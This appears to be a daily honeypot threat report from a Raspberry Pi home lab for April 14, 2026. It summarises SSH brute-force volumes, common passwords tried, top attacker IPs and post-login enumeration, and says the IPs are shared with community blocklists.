Honeypot Threat Analysis — April 14, 2026
High-severity day with 1,373 SSH connections and 195 post-auth commands. Attackers escalate from probing to active exploitation.
Threat Landscape Overview
A significant escalation — connections nearly quadrupled to 1,373 from 87 unique IPs. More concerning: 195 post-authentication commands were executed, meaning attackers are no longer just testing credentials. They’re actively trying to exploit compromised systems.
SSH Brute Force Analysis
1,265 login attempts represent aggressive credential stuffing at scale. The password dictionary has evolved: admin, 123456, 123, solana, and 1234 dominate. The appearance of 123 as a standalone password shows attackers are getting lazier — or more optimistic.
Top attacker 176.65.139.103 launched a sustained campaign, supported by persistent scanner 80.66.66.10 and Vietnamese IPs 171.231.191.10 and 171.231.184.15. The Vietnamese cluster suggests a compromised network being used as attack infrastructure.
Notable Trends
The 195 commands executed post-login mark a qualitative shift. Attackers who get past the honeypot’s fake authentication are running system enumeration commands — checking for architecture, running processes, and attempting to download payloads. This is real exploitation behavior, not just scanning.
Community Defense
All 87 attacker IPs and their associated TTPs (tactics, techniques, and procedures) are shared across AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield.
This analysis was generated for the Raspberry Pi 5 honeypot lab in Barcelona, Spain. View the raw data report for complete metrics.